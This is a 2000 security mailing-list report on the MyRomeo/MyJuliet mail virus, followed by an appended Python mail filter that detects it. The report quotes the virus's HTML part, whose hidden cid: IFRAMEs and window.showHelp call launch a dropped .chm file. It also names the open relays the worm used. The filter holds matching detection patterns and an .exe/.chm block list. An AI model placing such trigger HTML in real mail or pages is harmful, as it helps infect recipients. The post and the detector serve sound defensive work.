Security Incidents mailing list archives

new virus - myromeo


From: Piotr Klaban <makler () MAN TORUN PL>
Date: Thu, 16 Nov 2000 09:19:54 +0100

Hi,

Our nets were affected by the new mail virus - myromeo/myjuliet.
It is not recognized by, e.g., AVP with the current virus database.
Maybe you need to block it "by hand".

WHAT IT DOES TO THE COMPUTER:

Since I do not use Windows frequently, I do not know if this virus
does something bad to the computer. I have only the information described below.

HOW IT WORKS:

The mail opens an HTML page and magically runs the exe part. After that
it spreads across the net by mailing itself, connecting to the following
SMTP sites (they seem to be open relays):
  212.244.199.2 - gate.panoramix.net.pl (down for now)
  195.117.152.91 - dns.inter-grafix.com.pl (does not answer; overloaded?)
  195.116.62.86 - madmax.quadrosoft.com
  194.153.216.60 - mail1.getin.pl (open relay)

madmax is not an open relay now, but it was yesterday (?):

<from the mail>
  Received: from kmgwza (xxx [ip-num])
        by madmax.quadrosoft.com (8.9.3/8.9.3) with SMTP id KAA11833;
        Wed, 15 Nov 2000 10:03:25 +0100
</from the mail>

getin.pl is an open relay and responds with the following line:
220-mail1.getin.pl Microsoft SMTP MAIL ready at Thu, 16 Nov 2000 ... \
  Version: 5.5.1877.357.35


VIRUS MAIL:

There are a few attachments in the virus mail:
  1 <no description>                        [multipa/alternativ, 7bit, 0.7K]
  2 +-><no description>                 [text/plain, quoted, iso-8859-2, 0K]
  3 +-><no description>                [text/html, quoted, iso-8859-2, 0.4K]
  4 myromeo.exe                            [applica/x-msdownlo, base64, 38K]
  5 myjuliet.chm                          [applica/octet-stre, base64, 8.5K]

myromeo.exe is packed with UPX (a very good packing utility).
The html part consists of a few lines:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
</HEAD>
<BODY BGCOLOR="black" TEXT="red">
<DIV>&nbsp;</DIV>

<IFRAME width=1 height=1 src="cid:000701bf8458$eb570380$dc0732d4@666"></IFRAME>
<IFRAME width=1 height=1 src="cid:000701bf8458$eb570381$dc0732d4@666"></IFRAME>
<P></P>

<SCRIPT>
 window.showHelp("c:/windows/temp/myjuliet.chm");
</SCRIPT>

</BODY></HTML>

Maybe Outlook Express needs to be unpatched to run that, I do not know,
but users say that the attachment runs by itself.

Best regards,

--
Piotr Klaban
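A heuristic mail filter for messages of the shape described in the post above, added here as an example; it is not part of the original post and not the code of any product mentioned in it. It builds a constructed sample message that mimics the quoted MIME layout (placeholder bytes stand in for the real attachments) and flags the three indicators the post shows: a hidden IFRAME whose src is a cid: reference to an attachment, a script calling window.showHelp on a .chm file, and .exe/.chm attachments. The function names, the regular expressions and the blocked-extension list are my own assumptions, not something the post prescribes.

```python
"""Heuristic scanner for MyRomeo-style mail (added example, not from the original post)."""
import email
import email.policy
import re
from email.message import EmailMessage

# Indicators taken from the HTML part quoted in the post (regexes are my assumption).
IFRAME_CID_RE = re.compile(r'<iframe[^>]*\bsrc\s*=\s*"?cid:', re.IGNORECASE)
SHOWHELP_CHM_RE = re.compile(r'window\.showHelp\s*\(\s*["\'][^"\']*\.chm', re.IGNORECASE)
BLOCKED_EXTENSIONS = ('.exe', '.chm')   # assumed block list for "blocking by hand"


def build_sample_message() -> bytes:
    """Constructed sample mimicking the post's layout: multipart/alternative (plain + html)
    wrapped in multipart/mixed with an .exe and a .chm attachment carrying Content-IDs.
    The attachment bodies are harmless placeholder bytes, not the real virus."""
    msg = EmailMessage()
    msg['From'] = 'someone@example.invalid'
    msg['To'] = 'victim@example.invalid'
    msg['Subject'] = 'hi'
    msg.set_content('')                                  # empty text/plain part
    html = ('<HTML><BODY BGCOLOR="black" TEXT="red">\n'
            '<IFRAME width=1 height=1 src="cid:000701bf8458$eb570380$dc0732d4@666"></IFRAME>\n'
            '<IFRAME width=1 height=1 src="cid:000701bf8458$eb570381$dc0732d4@666"></IFRAME>\n'
            '<SCRIPT>\n window.showHelp("c:/windows/temp/myjuliet.chm");\n</SCRIPT>\n'
            '</BODY></HTML>\n')
    msg.add_alternative(html, subtype='html')            # becomes multipart/alternative
    msg.add_attachment(b'MZ placeholder', maintype='application', subtype='x-msdownload',
                       filename='myromeo.exe', cid='<000701bf8458$eb570380$dc0732d4@666>')
    msg.add_attachment(b'ITSF placeholder', maintype='application', subtype='octet-stream',
                       filename='myjuliet.chm', cid='<000701bf8458$eb570381$dc0732d4@666>')
    return msg.as_bytes()


def build_benign_message() -> bytes:
    """Constructed plain-text message that must pass the filter."""
    msg = EmailMessage()
    msg['From'] = 'someone@example.invalid'
    msg['To'] = 'victim@example.invalid'
    msg['Subject'] = 'lunch'
    msg.set_content('See you at 12.')
    return msg.as_bytes()


def scan_message(raw: bytes) -> list[str]:
    """Return a list of human-readable findings; empty means nothing suspicious."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    findings = []
    for part in msg.walk():
        ctype = part.get_content_type()
        filename = part.get_filename()
        if filename and filename.lower().endswith(BLOCKED_EXTENSIONS):
            findings.append(f'blocked attachment: {filename} ({ctype})')
        if ctype == 'text/html':
            body = part.get_content()                    # decodes quoted-printable (=3D etc.)
            if IFRAME_CID_RE.search(body):
                findings.append('hidden IFRAME referencing an inline attachment via cid:')
            if SHOWHELP_CHM_RE.search(body):
                findings.append('script launches a .chm via window.showHelp')
    return findings


def should_block(raw: bytes) -> bool:
    """Policy: block on any finding (an MTA hook would reject or quarantine here)."""
    return bool(scan_message(raw))


if __name__ == '__main__':
    for line in scan_message(build_sample_message()):
        print(line)
```

The HTML check runs on the decoded part body, so the quoted-printable `=3D` seen in the raw mail does not hide the `src="cid:` attribute from the regex; matching on the raw bytes instead would miss it.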
